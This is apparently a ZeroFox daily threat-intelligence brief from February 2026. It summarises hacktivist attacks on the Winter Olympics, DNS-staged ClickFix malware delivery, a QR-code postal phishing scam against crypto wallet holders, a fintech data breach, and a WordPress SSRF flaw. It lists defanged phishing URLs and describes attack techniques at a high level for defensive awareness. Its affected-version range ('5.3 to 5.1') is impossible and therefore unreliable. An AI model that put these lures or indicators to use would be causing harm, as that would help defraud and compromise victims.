ZeroFox Daily Intelligence Brief - February 16, 2026

ZeroFox Daily Intelligence Brief - February 16, 2026

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• ZeroFox Intelligence Flash Report - Sabotage and Cyber Disruptions at Milano Olympics
• Threat Actors Abuse DNS Lookups in Evolved ClickFix Attacks
• Postal Phishing Scam Hits Trezor and Ledger Crypto Wallet Holders

ZeroFox Intelligence Flash Report - Sabotage and Cyber Disruptions at Milano Olympics

Source: https://www.zerofox.com/advisories/38403/

What we know: ZeroFox has observed politically motivated, primarily pro-Russian threat actors overtly targeting the 2026 Winter Olympics since the event commenced. Z-Pentest and NoName057(16)—two of the most active pro-Russian hacktivist groups—have claimed responsibility for the majority of these attacks.

Context: These groups were observed to employ easily disseminated and replicated tactics, techniques, and procedures (TTPs), which enable widespread adoption and a consistently high rate of attack. The Russian Federation has a history of targeting the Olympics with cyberattacks as revenge for its formal exclusion from the Games.

Analyst note: As of reporting, the attacks have been low-impact, which aligns with these groups’ level of sophistication. Although pro-Russia hacktivists have occasionally damaged critical infrastructure, they often exaggerate their capabilities and the impact of their attacks to garner more attention.

Threat Actors Abuse DNS Lookups in Evolved ClickFix Attacks

Source: https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

What we know: The Domain Name System (DNS) is being used as a staging channel in "ClickFix" social engineering tactics, with threat actors weaponizing DNS lookups (“nslookup") to install a ModeloRAT remote access trojan on victims’ systems.

Context: ClickFix relies on unsuspecting victims copy-pasting malicious commands on their systems, after falling prey to lures such as fake CAPTCHAs or fraudulent user guides. While DNS has been weaponized previously (for Command and Control and data exfiltration system), the current use of DNS as a staging channel for a ClickFix attack is unique.

Analyst Note: The evolution to DNS-based staging indicates a sophisticated effort to bypass system security controls, allowing the threat actors to blend malicious activity with normal DNS traffic. This makes it challenging for defenders to take down or track, necessitating close monitoring of unusual nslookup patterns.This technique is likely to be adopted by other actors that rely on ClickFix variants, including CrashFix and ConsentFix.

Postal Phishing Scam Hits Trezor and Ledger Crypto Wallet Holders

Source: https://www.bleepingcomputer.com/news/security/snail-mail-letters-target-trezor-and-ledger-users-in-crypto-theft-attacks/

What we know: Trezor and Ledger cryptocurrency hardware wallet holders are reportedly being targeted in a phishing-letters scam for crypto theft, with threat actors trying to trick users into revealing recovery phrases by scanning QR codes.

Context: Physical letters with seemingly official letterheads coerce wallet users to complete a mandatory “Authentication Check” or “Transaction Check” to ensure wallet access, creating a sense of urgency. The QR codes lead to the phishing sites— hXXps://trezor.authentication-check[.]io/ and hXXps://ledger.setuptransactioncheck[.]com/—impersonating Trezor and Ledger pages.

Analyst note: Threat actors likely gained target information from data breaches at Trezor and Ledger. Compromised recovery phrases are almost certainly going to give threat actors complete access to the wallet and its funds.

DEEP AND DARK WEB INTELLIGENCE

Fintech Giant Hit by Data Breach: ShinyHunters has reportedly breached Figure, a blockchain-based fintech company, claiming to have leaked 2.5 GB of stolen data on its dark web leak site after the company denied a ransom demand. The leaked dataset reportedly includes customers’ full names, residential addresses, dates of birth, and phone numbers. The hackers allegedly lured an employee using a social engineering attack to gain initial access to the systems. Additionally, ShinyHunters claimed that the attack was part of a large hacking campaign targeting companies that rely on the single sign-on provider Okta. There is a roughly even chance that the leaked dataset could be used for dox-to-door attacks, swatting, or spear-stalking leading to physical as well as financial harm.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2026-1249: This is an authenticated server-side request forgery (SSRF) flaw in the Sonaar MP3 Audio Player for WordPress that enables threat actors to gain unauthorized access to internal network requests via the “load_lyrics_ajax_callback” function. Attackers with author-level access are likely to exploit the flaw to probe internal services and bypass firewall restrictions.

Affected products: MP3 Audio Player - Music Player, Podcast Player & Radio by Sonaar plugin for WordPress versions 5.3 to 5.1